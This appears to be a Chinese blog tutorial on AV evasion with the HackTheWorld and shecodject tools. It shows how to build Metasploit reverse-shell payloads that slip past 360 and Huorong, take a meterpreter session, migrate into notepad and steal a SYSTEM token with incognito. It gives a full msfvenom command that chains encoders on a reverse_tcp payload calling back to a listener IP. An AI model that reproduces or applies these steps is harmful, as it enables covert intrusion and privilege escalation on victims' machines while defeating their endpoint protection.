免殺之HackTheWorld與Shecodject

1、HackTheWorld

Git:https://github.com/stormshadow07/HackTheWorld

安裝環境python2,相關依賴環境。

 

生成一個msf免殺payload:

首先設置payload類型:

其中LHOST可以使用ngrok內網映射工具,將本地kali反射到公網。

LPORT是通過ngrok進行反射時分配的端口。

實驗過程中TCP類型的Payload被360查殺,https類型未被查殺。

之後就是輸入密鑰等等。

開啓msf的監聽模塊:

運行程序之後,未觸發360,成功獲取session:

原進程在火絨劍中屬於異常進程,獲取session之後首先進行進程遷移:

遷移到notepad進程。

 

權限提升:

通過令牌竊取提升權限:

首先是低權用戶,直接getsystem失敗:

導入incognito模塊:

列出可用令牌:

竊取system令牌:

注意添加雙引號和兩個反斜槓

成功獲取SYSTEM權限:

 

 

 

 

第二款工具:shecodject

Git地址:https://github.com/TaroballzChen/shecodject

安裝環境說明:2020版kali安裝過程使用root權限安裝,工具通過docker進行打包,會使用到docker鏡像,安裝完成之後最好將docker源換成國內源。

 

1、通過mpr方式生成免殺shellcode

執行run命令,會生成shellcode的臨時文件:

之後back回到系統命令,然後輸入exe對之前生成的臨時文件進行打包:

此處設置noconsole的值會影響360的查殺,有控制檯是360不能查殺,無console時會被查殺。

之後run既可以。

Noconsole被查殺

 

存在concole的沒有被查殺:

並且成功獲取session

 

 

2、

首先生成pem證書:

合併rsaprivate.key和servercertifcate.crt爲pem文件:

使用msfvenom生成原始的shellcode:

這裏使用多次編碼生成原始文件:

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.139 Lport=4444 --platform windows -a x86 HandlerSSLCert=./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > ./shellcode.raw

 

利用shecodject進行免殺:

使用scc模塊,將raw生成tmp文件:

然後利用exe模塊進行打包:

有console的狀態免殺:

測試無console,免殺:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章